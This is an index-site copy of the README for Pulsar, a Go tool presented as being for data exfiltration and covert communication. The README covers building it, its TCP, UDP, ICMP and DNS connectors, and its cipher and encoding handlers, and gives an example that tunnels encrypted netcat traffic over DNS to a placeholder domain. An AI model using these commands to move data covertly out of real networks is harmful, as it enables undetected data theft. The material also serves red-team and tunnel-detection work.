Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/jacopodl/Pulsar

Data exfiltration and covert communication tool
https://github.com/jacopodl/Pulsar

cryptography data-exfiltration golang network pulsar

Last synced: about 2 months ago
JSON representation

Data exfiltration and covert communication tool

Awesome Lists containing this project

README

        

![](https://img.shields.io/badge/Language-Go-orange.svg)
![](https://img.shields.io/badge/version-1.0.0-green.svg)
[![GPLv3 License](https://img.shields.io/badge/License-GPLv3-blue.svg)](http://www.gnu.org/licenses/gpl-3.0.html)
[![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=jacopodl_Pulsar&metric=alert_status)](https://sonarcloud.io/dashboard?id=jacopodl_Pulsar)

# Pulsar
Pulsar is a tool for data exfiltration and covert communication that enable you to create a secure data transfer,
a bizarre chat or a network tunnel through different protocols, for example you can receive data from tcp connection
and resend it to real destination through DNS packets :tada:

# Setting up Pulsar :hammer:

:warning: **Make sure you have at least Go 1.8 in your system to build Pulsar** :warning:

First, getting the code from repository and compile it with following command:

$ cd pulsar
$ go build -o bin/pulsar src/main.go

or run:

$ make

# Connectors :satellite:
A connector is a simple channel to the external world, with the connector you can read and write data from different sources.
* Console:
- Default in/out connector, read data from stdin and write to stdout
* TCP
- Read and write data through tcp connections

tcp:127.0.0.1:9000
* UDP
- Read and write data through udp packet

udp:127.0.0.1:9000
* ICMP
- Read and write data through icmp packet

icmp:127.0.0.1 (the connection port is obviously useless)
* DNS
- Read and write data through dns packet

dns:[email protected]:1994

You can use option --in in order to select input connector and option --out to select output connector:

--in tcp:127.0.0.1:9000
--out dns:fkdns.lol:2.3.4.5:8989

# Handlers :wrench:
A handler allows you to change data in transit, you can combine handlers arbitrarily.
* Stub:
- Default, do nothing, pass through

* Base32
- Base32 encoder/decoder

--handlers base32
* Base64
- Base64 encoder/decoder

--handlers base64
* Cipher
- CTR cipher, support AES/DES/TDES in CTR mode (Default: AES)

--handlers cipher:

You can use the --decode option to use *ALL* handlers in decoding mode

--handlers base64,base32,base64,cipher:key --decode

# Example
In the following example Pulsar will be used to create a secure two-way tunnel on DNS protocol, data will be read from TCP connection (simple nc client) and resend encrypted through the tunnel.

[nc 127.0.0.1 9000] <--TCP--> [pulsar] <--DNS--> [pulsar] <--TCP--> [nc -l 127.0.0.1 -p 9900]

192.168.1.198:

$ ./pulsar --in tcp:127.0.0.1:9000 --out dns:[email protected]:8989 --duplex --plain in --handlers 'cipher:supersekretkey!!'
$ nc 127.0.0.1 9000

192.168.1.199:

$ nc -l 127.0.0.1 -p 9900
$ ./pulsar --in dns:[email protected]:8989 --out tcp:127.0.0.1:9900 --duplex --plain out --handlers 'cipher:supersekretkey!!' --decode

# Contribute
All contributions are always welcome